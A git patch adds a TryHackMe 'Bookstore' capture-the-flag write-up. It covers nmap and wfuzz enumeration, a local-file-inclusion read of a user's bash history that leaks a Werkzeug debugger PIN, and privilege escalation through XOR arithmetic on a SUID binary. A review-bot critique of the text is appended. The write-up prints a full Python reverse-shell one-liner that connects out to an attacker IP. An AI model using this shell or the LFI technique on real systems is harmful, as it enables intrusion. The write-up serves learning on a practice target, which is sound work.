From 544ced23904a3fb26213871f1362790b879ff9b3 Mon Sep 17 00:00:00 2001 From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Sun, 29 Nov 2020 00:11:01 +0500 Subject: [PATCH] Add files via upload --- TryHackMe/Bookstore.md | 144 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 144 insertions(+) create mode 100644 TryHackMe/Bookstore.md diff --git a/TryHackMe/Bookstore.md b/TryHackMe/Bookstore.md new file mode 100644 index 0000000..40836f4 --- /dev/null +++ b/TryHackMe/Bookstore.md @@ -0,0 +1,144 @@ +# TryHackMe-Bookstore + +## NMAP + +``` +Nmap scan report for 10.10.117.123 +Host is up (0.15s latency). +Not shown: 65532 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA) +| 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA) +|_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-server-header: Apache/2.4.29 (Ubuntu) +|_http-title: Book Store +5000/tcp open http Werkzeug httpd 0.14.1 (Python 3.6.9) +| http-robots.txt: 1 disallowed entry +|_/api

+|_http-title: Home +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 1323.85 seconds + +``` + +## PORT 80 + + + +## PORT 5000 + + + +As we saw from nmap scan that there is a `robots.txt` file at port 5000 + + + + + +Running gobuster on this port we see a console a type of debugger + + + + + +But it's asking for a PIN. + +I found a metasploit exploit for it but it didn't worked + + + +Going back to port 80 and then looking at the login page source we find that PIN is in bash history file of user `sid`. + +We know there are two versions of api v1 and v2 , v1 is likely to be vulnerable to LFI so let's choose the endpoint that has a parameter + +`/api/v2/resources/books?id=1` + +Change this to + +`/api/v1/resources/books?id=.bash_history` + +then put it in `wfuzz` + +### Wfuzz + +``` +wfuzz -u http://10.10.117.123:5000/api/v1/resources/books\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 +``` + +Here + +`-u` the host with the api-endpoint +`?FUZZ` here ? 
is before the paramter and "FUZZ" is the location where we want to find the paramter +`--hc` is telling to hide status codes like 404 which is not found + + + + + +``` +cd /home/sid whoami export WERKZEUG_DEBUG_PIN=123-321-135 echo $WERKZEUG_DEBUG_PIN python3 /home/sid/api.py ls exit +``` + + + +And now we can interact with the debugger also in order to get into the box we have to paste a reverse shell there + +``` +import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.209.100",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); + +``` +Paste this on to the debugger and set your netcat listener + + + + +## Privlege Escalation + + + + +We see a binary which has a SUID on it so it can run as a root but we need to figure out what it is doing and how we can execute it properly to get root + + +On analyzing the binary with `ghidra` + + + +? ----> local_1c is the number we are going to input +4374 ----> +23987 ---> local_18 + +local_14 has to be this number 1573724660 + +I have converted those hexadecimal number to decimal to get a better understanding + + +`local_14 = local_1c ^ 4374 ^ local_18` + + +What's happening in here is that these three values are getting through and exclusive OR operator `^` .We don't know what value we put inorder to get `1573724660`. + +So I'll convert hex values to decimal and XOR between them + +``` +1573724660 ^ 4374 ^ local_18 + +1573724660 ^ 4374 ^ 23987 + +1573724660 ^ 19621 + +1573743953 + +``` + + +Let's try the final result we got + + + +And we are root ! \ No newline at end of file
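Review bot: In the Privilege Escalation section the line `4374 ---->` names no variable, and the step from `local_14 = local_1c ^ 4374 ^ local_18` to `1573724660 ^ 4374 ^ 23987` is never justified, so a reader cannot follow why XORing the target with the two constants yields the input. Suggest stating what 4374 corresponds to in the decompiled code and adding one sentence that XOR is its own inverse, which gives local_1c = local_14 ^ 4374 ^ local_18. The Wfuzz section has a similar gap: the text goes from the command straight to the `.bash_history` contents without saying which parameter name replaced FUZZ, so the result should be written out in text. Smaller points: "Privlege" and "paramter" are misspelled, the prose says hex values are converted to decimal but no hex values are shown, and the file ends without a trailing newline.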